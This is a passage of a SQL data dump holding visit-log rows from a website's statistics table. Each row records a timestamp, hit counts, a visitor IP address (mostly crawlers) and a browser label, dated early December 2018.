132','other'),(344887,1543761313,1,1,0,0,'54.36.148.248','other'),(344888,1543761422,2,2,0,0,'52.53.201.78','chrome'),(344889,1543761465,1,1,0,0,'207.241.229.213','other'),(344890,1543761532,1,1,0,0,'54.36.148.216','other'),(344891,1543761615,2,2,0,0,'207.241.229.51','other'),(344892,1543761661,1,1,0,0,'54.36.148.65','other'),(344893,1543761663,1,1,0,0,'46.229.168.149','other'),(344894,1543761766,1,1,0,0,'207.241.229.148','other'),(344895,1543761886,3,3,0,0,'178.154.244.29','other'),(344896,1543762519,2,2,0,0,'207.241.229.51','other'),(344897,1543762629,2,2,0,0,'66.249.73.24','chrome'),(344898,1543762844,1,1,0,0,'8.29.198.27','other'),(344899,1543763158,2,2,0,0,'40.77.167.138','other'),(344900,1543763207,1,1,0,0,'207.241.229.213','other'),(344901,1543763504,2,2,0,0,'207.241.229.148','other'),(344902,1543763561,1,1,0,0,'40.77.167.194','other'),(344903,1543763567,1,1,0,0,'178.154.244.29','other'),(344904,1543763604,1,1,0,0,'54.36.148.107','other'),(344905,1543763863,2,2,0,0,'207.241.231.147','other'),(344906,1543764047,1,1,0,0,'207.241.231.143','other'),(344907,1543764416,1,1,0,0,'207.241.229.148','other'),(344908,1543764491,1,1,0,0,'54.36.148.222','other'),(344909,1543764537,1,1,0,0,'207.241.231.151','other'),(344910,1543764756,1,1,0,0,'46.229.168.153','other'),(344911,1543764906,1,1,0,0,'8.29.198.25','other'),(344912,1543764928,1,1,0,0,'8.29.198.26','other'),(344913,1543765517,1,1,0,0,'207.241.229.51','other'),(344914,1543765895,3,3,0,0,'207.241.231.147','other'),(344915,1543765924,1,1,0,0,'207.46.13.198','other'),(344916,1543766126,1,1,0,0,'40.77.167.174','other'),(344917,1543766191,1,1,0,0,'46.229.168.135','other'),(344918,1543766216,1,1,0,0,'54.36.148.134','other'),(344919,1543766377,1,1,0,0,'46.229.168.132','other'),(344920,1543766433,1,1,0,0,'178.154.244.11','other'),(344921,1543766460,1,1,0,0,'178.154.171.27','other'),(344922,1543766462,1,1,0,0,'37.9.113.103','other'),(344923,1543766466,1,1,0,0,'54.36.148.137','other'),(344924,1543766643,1,1,0,0,'46.229.168.146','other'),(344925,1543766698,2,2,0,0,'178.154.244.29','other'),(344926,1543766874,1,1,0,0,'207.241.229.51','other'),(344927,1543766901,3,3,0,0,'207.241.229.148','other'),(344928,1543766905,1,1,0,0,'207.241.231.147','other'),(344929,1543767052,1,1,0,0,'95.163.255.151','other'),(344930,1543767055,1,1,0,0,'95.163.255.164','other'),(344931,1543767179,2,2,0,0,'66.249.73.24','chrome'),(344932,1543767343,1,1,0,0,'54.36.148.23','other'),(344933,1543767555,1,1,0,0,'46.229.168.129','other'),(344934,1543767557,1,1,0,0,'46.229.168.148','other'),(344935,1543767574,4,4,0,0,'91.209.11.236','other'),(344936,1543767600,3,3,0,0,'95.163.255.106','other'),(344937,1543767615,1,1,0,0,'95.163.255.119','other'),(344938,1543767662,1,1,0,0,'95.163.255.108','other'),(344939,1543767680,2,2,0,0,'95.163.255.107','other'),(344940,1543767767,4,4,0,0,'178.154.244.29','other'),(344941,1543767799,1,1,0,0,'95.163.255.116','other'),(344942,1543767805,2,2,0,0,'207.241.231.151','other'),(344943,1543767828,1,1,0,0,'66.249.73.23','chrome'),(344944,1543767847,1,1,0,0,'95.163.255.104','other'),(344945,1543767852,1,1,0,0,'66.249.73.26','chrome'),(344946,1543767906,1,1,0,0,'66.249.65.121','chrome'),(344947,1543767930,1,1,0,0,'95.163.255.103','other'),(344948,1543767934,1,1,0,0,'66.249.65.106','chrome'),(344949,1543768027,1,1,0,0,'95.163.255.102','other'),(344950,1543768178,1,1,0,0,'95.163.255.115','other'),(344951,1543768204,1,1,0,0,'207.241.229.213','other'),(344952,1543768269,2,2,0,0,'5.45.207.79','other'),(344953,1543768296,1,1,0,0,'5.153.130.241','chrome'),(344954,1543768307,1,1,0,0,'54.36.148.19','other'),(344955,1543768329,3,3,0,0,'207.241.229.148','other'),(344956,1543768353,1,1,0,0,'40.77.167.174','other'),(344957,1543768381,1,1,0,0,'5.153.130.195','chrome'),(344958,1543768458,1,1,0,0,'54.36.148.208','other'),(344959,1543768462,1,1,0,0,'37.73.62.4','chrome'),(344960,1543768547,9,9,0,0,'178.154.244.11','other'),(344961,1543768575,1,1,0,0,'13.66.139.0','other'),(344962,1543768708,6,6,0,0,'178.154.244.29','other'),(344963,1543768733,2,2,0,0,'207.241.231.147','other'),(344964,1543768755,2,2,0,0,'5.45.207.19','other'),(344965,1543769051,2,2,0,0,'207.241.231.143','other'),(344966,1543769317,1,1,0,0,'46.229.168.143','other'),(344967,1543769410,1,1,0,0,'5.45.207.79','other'),(344968,1543769555,2,2,0,0,'207.241.231.151','other'),(344969,1543769873,1,1,0,0,'207.46.13.198','other'),(344970,1543770001,1,1,0,0,'207.241.229.51','other'),(344971,1543770090,1,1,0,0,'54.36.148.190','other'),(344972,1543770175,4,4,0,0,'178.154.244.29','other'),(344973,1543770180,1,1,0,0,'54.36.148.61','other'),(344974,1543770189,1,1,0,0,'95.163.255.92','other'),(344975,1543770196,1,1,0,0,'95.163.255.98','other'),(344976,1543770235,1,1,0,0,'54.36.148.217','other'),(344977,1543770280,1,1,0,0,'54.36.149.102','other'),(344978,1543770573,1,1,0,0,'54.36.148.181','other'),(344979,1543770846,1,1,0,0,'54.36.149.65','other'),(344980,1543770885,1,1,0,0,'95.163.255.152','other'),(344981,1543770893,1,1,0,0,'95.163.255.191','other'),(344982,1543771190,1,1,0,0,'207.241.231.143','other'),(344983,1543771418,3,3,0,0,'207.241.231.147','other'),(344984,1543771966,1,1,0,0,'95.163.255.117','other'),(344985,1543772079,1,1,0,0,'54.36.149.15','other'),(344986,1543772090,1,1,0,0,'54.36.149.31','other'),(344987,1543772095,2,2,0,0,'207.241.231.143','other'),(344988,1543772164,1,1,0,0,'95.163.255.102','other'),(344989,1543772174,1,1,0,0,'46.229.168.135','other'),(344990,1543772441,1,1,0,0,'95.163.255.115','other'),(344991,1543772740,2,2,0,0,'207.241.231.151','other'),(344992,1543772883,3,3,0,0,'207.241.229.148','other'),(344993,1543773088,1,1,0,0,'54.36.149.18','other'),(344994,1543773101,1,1,0,0,'207.241.231.143','other'),(344995,1543773291,1,1,0,0,'54.36.149.62','other'),(344996,1543773310,2,2,0,0,'207.46.13.198','other'),(344997,1543773684,1,1,0,0,'8.29.198.26','other'),(344998,1543773788,2,2,0,0,'207.241.229.148','other'),(344999,1543773838,1,1,0,0,'54.36.148.95','other'),(345000,1543773915,1,1,0,0,'54.36.149.10','other'),(345001,1543774014,1,1,0,0,'54.36.148.151','other'),(345002,1543774318,1,1,0,0,'207.241.231.151','other'),(345003,1543774322,1,0,1,0,'66.249.73.23',''),(345004,1543774333,1,0,1,0,'66.249.73.25',''),(345005,1543774370,1,1,0,0,'207.241.231.143','other'),(345006,1543774373,1,1,0,0,'54.36.148.22','other'),(345007,1543774510,1,1,0,0,'46.229.168.148','other'),(345008,1543774671,1,1,0,0,'54.36.148.178','other'),(345009,1543774769,1,1,0,0,'207.241.231.147','other'),(345010,1543774810,1,1,0,0,'40.77.167.174','other'),(345011,1543774910,2,2,0,0,'207.241.229.51','other'),(345012,1543775018,2,2,0,0,'207.241.229.148','other'),(345013,1543775131,1,1,0,0,'54.36.148.164','other'),(345014,1543775300,1,1,0,0,'66.249.65.108','chrome'),(345015,1543775314,1,1,0,0,'46.229.168.152','other'),(345016,1543775320,1,1,0,0,'46.229.168.139','other'),(345017,1543775410,1,1,0,0,'157.55.39.97','other'),(345018,1543775612,1,1,0,0,'95.163.255.118','other'),(345019,1543775628,1,1,0,0,'95.163.255.109','other'),(345020,1543775646,1,1,0,0,'95.163.255.103','other'),(345021,1543775659,1,1,0,0,'95.163.255.105','other'),(345022,1543775693,1,1,0,0,'95.163.255.116','other'),(345023,1543775701,1,1,0,0,'95.163.255.107','other'),(345024,1543775748,1,1,0,0,'8.29.198.26','other'),(345025,1543775759,1,1,0,0,'8.29.198.27','other'),(345026,1543775812,2,2,0,0,'207.241.231.151','other'),(345027,1543775855,1,1,0,0,'40.77.167.194','other'),(345028,1543775983,1,1,0,0,'54.36.149.25','other'),(345029,1543776067,1,1,0,0,'207.241.231.147','other'),(345030,1543776155,1,1,0,0,'207.241.231.143','other'),(345031,1543776369,1,1,0,0,'157.55.39.97','other'),(345032,1543776385,1,1,0,0,'95.163.255.169','other'),(345033,1543776388,1,1,0,0,'95.163.255.164','other'),(345034,1543776749,6,6,0,0,'207.241.229.148','other'),(345035,1543776767,1,1,0,0,'54.36.148.94','other'),(345036,1543776783,1,1,0,0,'46.229.168.148','other'),(345037,1543776904,1,1,0,0,'66.249.73.24','chrome'),(345038,1543777059,5,5,0,0,'207.241.231.143','other'),(345039,1543777332,1,0,1,0,'66.249.65.125',''),(345040,1543777342,1,0,1,0,'66.249.65.106',''),(345041,1543777469,1,1,0,0,'54.36.148.192','other'),(345042,1543777695,2,2,0,0,'207.241.231.147','other'),(345043,1543778008,1,1,0,0,'54.36.148.116','other'),(345044,1543778135,1,1,0,0,'54.36.149.101','other'),(345045,1543778195,1,1,0,0,'54.36.148.184','other'),(345046,1543778271,1,1,0,0,'54.36.149.86','other'),(345047,1543778287,3,3,0,0,'207.241.231.143','other'),(345048,1543778384,1,1,0,0,'54.36.148.130','other'),(345049,1543778726,1,1,0,0,'207.241.229.51','other'),(345050,1543779021,1,1,0,0,'46.229.168.150','other'),(345051,1543779023,1,1,0,0,'46.229.168.130','other'),(345052,1543779093,1,1,0,0,'207.46.13.198','other'),(345053,1543779246,18,18,0,0,'178.154.244.29','other'),(345054,1543779273,11,11,0,0,'178.154.244.11','other'),(345055,1543779384,1,1,0,0,'157.55.39.124','other'),(345056,1543779462,1,1,0,0,'46.229.168.134','other'),(345057,1543779525,1,1,0,0,'37.9.113.20','other'),(345058,1543779552,1,1,0,0,'54.36.148.253','other'),(345059,1543779625,3,3,0,0,'5.45.207.79','other'),(345060,1543779679,2,2,0,0,'5.45.207.19','other'),(345061,1543779871,3,3,0,0,'54.165.59.7','other'),(345062,1543780122,1,1,0,0,'54.36.149.87','other'),(345063,1543780127,1,1,0,0,'87.250.224.47','other'),(345064,1543780216,17,17,0,0,'178.154.244.29','other'),(345065,1543780316,1,1,0,0,'54.36.148.170','other'),(345066,1543780326,6,6,0,0,'178.154.244.11','other'),(345067,1543780654,1,1,0,0,'5.45.207.79','other'),(345068,1543780694,1,1,0,0,'54.36.148.24','other'),(345069,1543780920,1,1,0,0,'54.36.148.101','other'),(345070,1543781124,3,3,0,0,'178.154.244.29','other'),(345071,1543781335,1,1,0,0,'178.154.244.11','other'),(345072,1543781409,1,1,0,0,'54.36.148.25','other'),(345073,1543781411,1,1,0,0,'54.36.148.208','other'),(345074,1543781601,1,1,0,0,'54.165.59.7','other'),(345075,1543781788,1,1,0,0,'5.45.207.19','other'),(345076,1543781874,1,1,0,0,'66.249.73.23','chrome'),(345077,1543781926,1,1,0,0,'66.249.73.24','chrome'),(345078,1543782048,1,1,0,0,'5.45.207.79','other'),(345079,1543782075,1,1,0,0,'178.154.244.29','other'),(345080,1543782255,1,1,0,0,'54.36.148.198','other'),(345081,1543782616,2,2,0,0,'54.165.59.7','other'),(345082,1543782698,1,1,0,0,'95.163.255.183','other'),(345083,1543782701,1,1,0,0,'95.163.255.191','other'),(345084,1543782865,2,2,0,0,'157.55.39.97','other'),(345085,1543782911,1,1,0,0,'54.36.149.65','other'),(345086,1543783001,1,1,0,0,'46.229.168.129','other'),(345087,1543783451,3,3,0,0,'178.154.244.29','other'),(345088,1543783629,1,1,0,0,'178.154.244.11','other'),(345089,1543784057,1,1,0,0,'54.36.149.80','other'),(345090,1543784395,1,1,0,0,'54.36.148.68','other'),(345091,1543784447,1,1,0,0,'54.36.149.87','other'),(345092,1543784482,1,1,0,0,'46.229.168.129','other'),(345093,1543784517,1,1,0,0,'8.29.198.27','other'),(345094,1543784568,1,1,0,0,'54.165.59.7','other'),(345095,1543784585,1,1,0,0,'54.36.149.103','other'),(345096,1543784704,1,1,0,0,'66.249.65.123','chrome'),(345097,1543784723,1,1,0,0,'66.249.65.106','chrome'),(345098,1543784748,1,1,0,0,'178.154.244.11','other'),(345099,1543785290,2,2,0,0,'207.46.13.198','other'),(345100,1543785441,1,1,0,0,'46.229.168.145','other'),(345101,1543785725,1,1,0,0,'54.36.149.107','other'),(345102,1543785892,2,2,0,0,'66.249.73.25','chrome'),(345103,1543785925,1,1,0,0,'54.36.149.100','other'),(345104,1543786151,1,1,0,0,'66.249.73.23','chrome'),(345105,1543786552,1,1,0,0,'54.36.148.150','other'),(345106,1543786589,1,1,0,0,'8.29.198.27','other'),(345107,1543786597,1,1,0,0,'8.29.198.26','other'),(345108,1543786724,1,1,0,0,'46.229.168.149','other'),(345109,1543786727,2,2,0,0,'46.229.168.133','other'),(345110,1543786859,2,2,0,0,'178.154.244.29','other'),(345111,1543786908,1,1,0,0,'178.154.244.11','other'),(345112,1543786934,1,1,0,0,'46.229.168.130','other'),(345113,1543787105,1,1,0,0,'37.55.96.160','opera'),(345114,1543787245,1,1,0,0,'54.36.149.49','other'),(345115,1543787811,1,1,0,0,'157.55.39.97','other'),(345116,1543787926,1,1,0,0,'54.36.148.241','other'),(345117,1543787987,10,10,0,0,'178.154.244.11','other'),(345118,1543788002,20,20,0,0,'178.154.244.29','other'),(345119,1543788009,1,1,0,0,'5.45.207.79','other'),(345120,1543788015,1,1,0,0,'5.45.207.19','other'),(345121,1543788030,2,2,0,0,'40.77.167.174','other'),(345122,1543788163,1,1,0,0,'54.36.148.143','other'),(345123,1543788186,1,1,0,0,'87.250.224.65','other'),(345124,1543788578,1,1,0,0,'46.229.168.143','other'),(345125,1543788580,1,1,0,0,'46.229.168.152','other'),(345126,1543788609,1,1,0,0,'54.36.148.157','other'),(345127,1543788730,1,1,0,0,'207.46.13.198','other'),(345128,1543788926,1,1,0,0,'178.154.244.11','other'),(345129,1543788991,1,1,0,0,'40.77.167.174','other'),(345130,1543789049,5,5,0,0,'178.154.244.29','other'),(345131,1543789423,5,5,0,0,'93.73.95.230','chrome'),(345132,1543789578,1,1,0,0,'95.108.181.75','other'),(345133,1543789796,2,2,0,0,'54.165.59.7','other'),(345134,1543789804,1,1,0,0,'54.36.148.50','other'),(345135,1543789871,1,1,0,0,'157.55.39.97','other'),(345136,1543790281,1,1,0,0,'54.36.148.124','other'),(345137,1543790808,1,1,0,0,'54.36.148.92','other'),(345138,1543791088,1,1,0,0,'54.36.148.47','other'),(345139,1543791160,1,1,0,0,'46.229.168.138','other'),(345140,1543791303,1,1,0,0,'54.36.148.242','other'),(345141,1543791351,1,1,0,0,'54.36.148.221','other'),(345142,1543791557,1,1,0,0,'46.229.168.152','other'),(345143,1543791765,1,1,0,0,'157.55.39.97','other'),(345144,1543791891,1,1,0,0,'54.36.148.171','other'),(345145,1543791946,1,1,0,0,'54.36.148.35','other'),(345146,1543791947,2,2,0,0,'40.77.167.174','other'),(345147,1543792021,1,1,0,0,'95.163.255.197','other'),(345148,1543792487,1,1,0,0,'31.42.172.13','msie'),(345149,1543792741,1,1,0,0,'54.36.148.93','other'),(345150,1543792811,1,1,0,0,'207.46.13.198','other'),(345151,1543792826,1,1,0,0,'178.154.244.29','other'),(345152,1543792837,1,1,0,0,'54.36.149.60','other'),(345153,1543792958,1,1,0,0,'54.36.148.80','other'),(345154,1543793399,1,1,0,0,'54.36.149.81','other'),(345155,1543793463,1,1,0,0,'54.36.148.117','other'),(345156,1543793991,1,1,0,0,'54.36.149.39','other'),(345157,1543794098,1,1,0,0,'54.36.148.53','other'),(345158,1543794155,1,1,0,0,'46.229.168.141','other'),(345159,1543794234,1,1,0,0,'54.36.148.75','other'),(345160,1543794327,1,1,0,0,'185.254.188.213','chrome'),(345161,1543794720,1,1,0,0,'157.55.39.97','other'),(345162,1543794765,1,1,0,0,'207.46.13.198','other'),(345163,1543795362,1,1,0,0,'8.29.198.26','other'),(345164,1543795441,1,1,0,0,'54.36.148.137','other'),(345165,1543795472,1,1,0,0,'40.77.167.174','other'),(345166,1543795498,1,1,0,0,'54.36.149.87','other'),(345167,1543796122,1,1,0,0,'66.249.73.25','chrome'),(345168,1543796555,1,1,0,0,'54.36.148.148','other'),(345169,1543796678,1,1,0,0,'157.55.39.97','other'),(345170,1543796919,1,1,0,0,'54.36.148.87','other'),(345171,1543797082,1,1,0,0,'46.229.168.138','other'),(345172,1543797111,11,11,0,0,'178.154.244.29','other'),(345173,1543797271,7,7,0,0,'178.154.244.11','other'),(345174,1543797406,1,1,0,0,'141.8.142.103','other'),(345175,1543797425,1,1,0,0,'8.29.198.26','other'),(345176,1543797429,1,1,0,0,'8.29.198.27','other'),(345177,1543797481,1,1,0,0,'46.229.168.147','other'),(345178,1543797484,1,1,0,0,'46.229.168.142','other'),(345179,1543798168,1,1,0,0,'54.36.148.36','other'),(345180,1543798295,1,1,0,0,'95.163.255.165','other'),(345181,1543798297,1,1,0,0,'95.163.255.178','other'),(345182,1543798556,1,1,0,0,'85.248.227.165','other'),(345183,1543798881,1,1,0,0,'178.154.244.29','other'),(345184,1543798885,1,1,0,0,'178.154.244.11','other'),(345185,1543799027,1,1,0,0,'54.36.148.245','other'),(345186,1543799208,1,1,0,0,'54.36.149.32','other'),(345187,1543799246,1,1,0,0,'54.36.148.135','other'),(345188,1543799250,1,1,0,0,'157.55.39.97','other'),(345189,1543799397,1,1,0,0,'54.36.148.164','other'),(345190,1543799604,1,1,0,0,'134.249.49.211','chrome'),(345191,1543799614,1,1,0,0,'54.36.148.254','other'),(345192,1543799777,1,1,0,0,'83.208.47.57','chrome'),(345193,1543800352,1,1,0,0,'54.36.148.63','other'),(345194,1543800378,1,1,0,0,'54.165.59.7','other'),(345195,1543800547,12,12,0,0,'54.36.115.76','firefox'),(345196,1543800550,4,4,0,0,'54.36.115.76','other'),(345197,1543800706,1,1,0,0,'54.36.149.9','other'),(345198,1543801001,1,1,0,0,'54.36.148.241','other'),(345199,1543801008,1,1,0,0,'40.77.167.92','other'),(345200,1543801469,2,2,0,0,'54.36.148.74','other'),(345201,1543801670,1,1,0,0,'54.36.148.170','other'),(345202,1543802304,1,1,0,0,'144.76.81.72','other'),(345203,1543802332,1,1,0,0,'54.36.149.46','other'),(345204,1543802847,1,1,0,0,'54.36.148.129','other'),(345205,1543803139,1,1,0,0,'54.36.148.189','other'),(345206,1543803405,1,1,0,0,'157.55.39.97','other'),(345207,1543803466,1,1,0,0,'54.36.148.169','other'),(345208,1543803499,1,1,0,0,'54.36.148.30','other'),(345209,1543804003,1,1,0,0,'54.165.59.7','other'),(345210,1543804148,1,1,0,0,'46.229.168.129','other'),(345211,1543804151,1,1,0,0,'46.229.168.145','other'),(345212,1543804176,1,1,0,0,'54.36.148.44','other'),(345213,1543804213,2,2,0,0,'66.249.73.24','chrome'),(345214,1543804525,1,1,0,0,'54.36.148.184','other'),(345215,1543805087,1,1,0,0,'95.163.255.170','other'),(345216,1543805090,1,1,0,0,'95.163.255.151','other'),(345217,1543805556,2,2,0,0,'35.167.58.70','chrome'),(345218,1543805577,1,1,0,0,'46.229.168.138','other'),(345219,1543805580,1,1,0,0,'46.229.168.149','other'),(345220,1543805614,2,2,0,0,'94.154.239.69','other'),(345221,1543805698,13,13,0,0,'178.154.244.29','other'),(345222,1543805882,3,3,0,0,'178.154.244.11','other'),(345223,1543805913,1,1,0,0,'46.229.168.140','other'),(345224,1543805915,1,1,0,0,'46.229.168.150','other'),(345225,1543806206,1,1,0,0,'5.45.207.19','other'),(345226,1543806214,1,1,0,0,'8.29.198.25','other'),(345227,1543806288,1,1,0,0,'37.9.113.103','other'),(345228,1543806357,1,1,0,0,'54.36.149.63','other'),(345229,1543806427,1,1,0,0,'5.45.207.79','other'),(345230,1543806660,5,5,0,0,'178.154.244.29','other'),(345231,1543806714,1,1,0,0,'54.36.148.111','other'),(345232,1543806815,2,2,0,0,'178.154.244.11','other'),(345233,1543807057,1,1,0,0,'157.55.39.97','other'),(345234,1543807802,1,1,0,0,'46.229.168.135','other'),(345235,1543807905,1,1,0,0,'46.229.168.145','other'),(345236,1543808260,2,2,0,0,'8.29.198.26','other'),(345237,1543808372,1,1,0,0,'54.36.148.231','other'),(345238,1543808471,1,1,0,0,'54.36.149.56','other'),(345239,1543808472,1,1,0,0,'157.55.39.97','other'),(345240,1543808594,1,1,0,0,'54.36.148.207','other'),(345241,1543808690,1,1,0,0,'54.36.148.101','other'),(345242,1543808809,1,1,0,0,'54.36.149.87','other'),(345243,1543808923,1,1,0,0,'54.36.148.76','other'),(345244,1543809124,1,1,0,0,'95.163.255.190','other'),(345245,1543809129,1,1,0,0,'95.163.255.188','other'),(345246,1543809177,1,1,0,0,'54.36.148.89','other'),(345247,1543809215,1,1,0,0,'54.36.149.49','other'),(345248,1543809547,1,1,0,0,'66.249.73.24','chrome'),(345249,1543809746,1,1,0,0,'46.229.168.149','other'),(345250,1543809823,1,1,0,0,'95.163.255.98','other'),(345251,1543809827,1,1,0,0,'95.163.255.97','other'),(345252,1543810347,1,1,0,0,'54.36.149.8','other'),(345253,1543810519,1,1,0,0,'157.55.39.97','other'),(345254,1543810614,1,1,0,0,'139.99.176.62','chrome'),(345255,1543810784,1,1,0,0,'54.36.148.141','other'),(345256,1543810956,1,1,0,0,'46.229.168.137','other'),(345257,1543811160,1,1,0,0,'46.229.168.141','other'),(345258,1543811162,1,1,0,0,'46.229.168.130','other'),(345259,1543811400,2,2,0,0,'178.154.244.11','other'),(345260,1543811769,1,1,0,0,'46.229.168.145','other'),(345261,1543812836,1,1,0,0,'46.229.168.140','other'),(345262,1543812859,1,1,0,0,'54.36.148.156','other'),(345263,1543813138,1,1,0,0,'5.45.207.79','other'),(345264,1543813241,1,1,0,0,'46.229.168.153','other'),(345265,1543813290,1,1,0,0,'178.154.244.11','other'),(345266,1543813450,1,1,0,0,'54.36.148.235','other'),(345267,1543813489,1,1,0,0,'54.36.149.46','other'),(345268,1543813575,1,1,0,0,'54.36.148.75','other'),(345269,1543813818,1,1,0,0,'66.249.73.24','chrome'),(345270,1543813881,1,1,0,0,'54.36.149.106','other'),(345271,1543813913,1,1,0,0,'54.36.149.42','other'),(345272,1543814156,1,1,0,0,'46.229.168.145','other'),(345273,1543814563,1,1,0,0,'40.77.167.92','other'),(345274,1543814817,5,5,0,0,'5.45.207.79','other'),(345275,1543814825,3,3,0,0,'5.45.207.19','other'),(345276,1543814842,1,1,0,0,'54.36.148.100','other'),(345277,1543814876,9,9,0,0,'178.154.244.29','other'),(345278,1543814966,11,11,0,0,'178.154.244.11','other'),(345279,1543815672,1,1,0,0,'54.36.148.245','other'),(345280,1543815783,2,2,0,0,'178.154.244.29','other'),(345281,1543815785,1,1,0,0,'141.8.142.103','other'),(345282,1543815887,1,1,0,0,'46.229.168.136','other'),(345283,1543816904,1,1,0,0,'54.36.148.102','other'),(345284,1543817054,1,1,0,0,'8.29.198.26','other'),(345285,1543817264,1,1,0,0,'54.36.148.123','other'),(345286,1543817461,1,1,0,0,'66.249.65.108','chrome'),(345287,1543817469,1,1,0,0,'54.36.148.144','other'),(345288,1543817516,1,1,0,0,'66.249.65.104','chrome'),(345289,1543817681,1,1,0,0,'79.137.143.52','chrome'),(345290,1543817894,1,1,0,0,'54.36.148.20','other'),(345291,1543818020,1,1,0,0,'54.36.148.201','other'),(345292,1543818413,1,1,0,0,'54.36.149.99','other'),(345293,1543818517,1,1,0,0,'54.36.148.232','other'),(345294,1543818560,1,1,0,0,'54.36.148.247','other'),(345295,1543818626,1,1,0,0,'46.229.168.151','other'),(345296,1543818771,1,1,0,0,'157.55.39.97','other'),(345297,1543818791,1,1,0,0,'54.36.148.183','other'),(345298,1543818858,1,1,0,0,'54.36.148.161','other'),(345299,1543818861,1,1,0,0,'54.36.148.244','other'),(345300,1543819054,1,1,0,0,'178.93.120.208','chrome'),(345301,1543819094,2,2,0,0,'8.29.198.25','other'),(345302,1543819163,2,2,0,0,'91.196.178.66','chrome'),(345303,1543819273,1,1,0,0,'54.36.148.234','other'),(345304,1543819353,1,1,0,0,'54.36.149.42','other'),(345305,1543819485,1,1,0,0,'54.36.148.173','other'),(345306,1543819977,1,1,0,0,'54.36.148.58','other'),(345307,1543820233,1,1,0,0,'54.36.149.94','other'),(345308,1543820309,3,3,0,0,'91.196.178.169','chrome'),(345309,1543820944,1,1,0,0,'5.45.207.79','other'),(345310,1543821078,1,1,0,0,'54.36.149.99','other'),(345311,1543821099,1,1,0,0,'54.36.148.142','other'),(345312,1543821376,1,1,0,0,'95.163.255.183','other'),(345313,1543821380,1,1,0,0,'95.163.255.159','other'),(345314,1543821445,1,1,0,0,'54.36.149.91','other'),(345315,1543821471,1,1,0,0,'54.36.148.211','other'),(345316,1543821548,1,1,0,0,'54.36.148.246','other'),(345317,1543821667,1,1,0,0,'46.229.168.139','other'),(345318,1543821670,1,1,0,0,'46.229.168.147','other'),(345319,1543821688,1,1,0,0,'54.36.148.44','other'),(345320,1543822092,1,1,0,0,'54.36.148.10','other'),(345321,1543822153,2,2,0,0,'66.249.73.24','chrome'),(345322,1543822198,1,1,0,0,'46.229.168.144','other'),(345323,1543822201,1,1,0,0,'46.229.168.149','other'),(345324,1543822243,1,1,0,0,'54.36.149.94','other'),(345325,1543822317,1,1,0,0,'54.36.149.35','other'),(345326,1543822859,1,1,0,0,'54.36.148.11','other'),(345327,1543822901,1,1,0,0,'91.196.178.66','chrome'),(345328,1543822956,2,2,0,0,'157.55.39.97','other'),(345329,1543823083,1,1,0,0,'54.36.149.78','other'),(345330,1543823175,2,2,0,0,'95.132.232.57','chrome'),(345331,1543823281,1,1,0,0,'54.36.149.39','other'),(345332,1543823608,1,1,0,0,'54.36.148.78','other'),(345333,1543823623,1,1,0,0,'54.36.149.66','other'),(345334,1543824317,1,1,0,0,'141.8.142.103','other'),(345335,1543824602,1,1,0,0,'54.36.148.145','other'),(345336,1543824626,1,1,0,0,'54.36.148.67','other'),(345337,1543824997,2,2,0,0,'178.154.244.29','other'),(345338,1543825377,2,2,0,0,'5.45.207.79','other'),(345339,1543825444,1,1,0,0,'54.36.148.117','other'),(345340,1543825652,5,5,0,0,'178.154.244.11','other'),(345341,1543825756,1,1,0,0,'157.55.39.97','other'),(345342,1543825877,1,1,0,0,'54.36.148.215','other'),(345343,1543826006,13,13,0,0,'178.154.244.29','other'),(345344,1543826136,1,1,0,0,'54.36.149.76','other'),(345345,1543826175,1,1,0,0,'54.36.148.177','other'),(345346,1543826196,1,1,0,0,'5.45.207.19','other'),(345347,1543826290,2,2,0,0,'5.45.207.79','other'),(345348,1543826409,1,1,0,0,'54.36.149.74','other'),(345349,1543826554,3,3,0,0,'178.154.244.11','other'),(345350,1543826607,2,2,0,0,'91.196.177.46','firefox'),(345351,1543826645,1,1,0,0,'91.196.178.66','chrome'),(345352,1543826648,1,1,0,0,'95.163.255.93','other'),(345353,1543826653,1,1,0,0,'95.163.255.95','other'),(345354,1543826704,1,1,0,0,'54.36.148.129','other'),(345355,1543827039,1,1,0,0,'54.165.59.7','other'),(345356,1543827457,2,2,0,0,'178.154.244.29','other'),(345357,1543827538,1,1,0,0,'54.36.149.2','other'),(345358,1543827565,1,1,0,0,'91.196.178.82','chrome'),(345359,1543827698,1,1,0,0,'95.163.255.158','other'),(345360,1543827701,1,1,0,0,'95.163.255.163','other'),(345361,1543827870,1,1,0,0,'178.93.56.41','chrome'),(345362,1543827893,1,1,0,0,'8.29.198.25','other'),(345363,1543828030,1,1,0,0,'46.229.168.136','other'),(345364,1543828064,1,1,0,0,'54.36.149.44','other'),(345365,1543828067,1,1,0,0,'89.19.124.53','firefox'),(345366,1543828566,1,1,0,0,'5.45.207.79','other'),(345367,1543828624,1,1,0,0,'54.165.59.7','other'),(345368,1543828650,2,2,0,0,'162.210.196.98','other'),(345369,1543828769,1,1,0,0,'54.36.148.32','other'),(345370,1543828950,1,1,0,0,'54.36.148.51','other'),(345371,1543829586,1,1,0,0,'178.154.244.29','other'),(345372,1543829587,1,1,0,0,'178.154.244.11','other'),(345373,1543829627,1,1,0,0,'54.36.149.19','other'),(345374,1543829773,1,1,0,0,'54.36.148.103','other'),(345375,1543829927,1,1,0,0,'8.29.198.25','other'),(345376,1543829929,1,1,0,0,'8.29.198.27','other'),(345377,1543830131,3,3,0,0,'66.249.73.24','chrome'),(345378,1543830263,1,1,0,0,'66.249.73.23','chrome'),(345379,1543830418,1,1,0,0,'54.36.148.124','other'),(345380,1543830490,1,1,0,0,'54.36.149.14','other'),(345381,1543830535,1,1,0,0,'54.36.149.41','other'),(345382,1543831335,1,1,0,0,'54.36.148.188','other'),(345383,1543831921,1,1,0,0,'66.249.65.108','chrome'),(345384,1543831932,1,1,0,0,'54.36.149.47','other'),(345385,1543832134,1,1,0,0,'54.36.149.71','other'),(345386,1543832606,1,1,0,0,'40.77.167.92','other'),(345387,1543832657,1,1,0,0,'218.30.103.70','other'),(345388,1543832907,1,1,0,0,'54.36.149.92','other'),(345390,1543833026,1,1,0,0,'54.36.148.16','other'),(345391,1543833129,1,1,0,0,'207.46.13.241','other'),(345392,1543833362,1,1,0,0,'54.36.148.189','other'),(345393,1543833791,1,1,0,0,'54.36.148.119','other'),(345394,1543834213,2,2,0,0,'40.77.167.92','other'),(345395,1543834284,1,1,0,0,'54.36.148.193','other'),(345396,1543834794,1,1,0,0,'95.163.255.164','other'),(345397,1543834797,1,1,0,0,'95.163.255.181','other'),(345398,1543834947,1,1,0,0,'54.36.148.207','other'),(345399,1543835065,1,1,0,0,'54.36.149.98','other'),(345400,1543835107,1,1,0,0,'178.95.246.220','chrome'),(345401,1543835433,1,1,0,0,'54.36.148.129',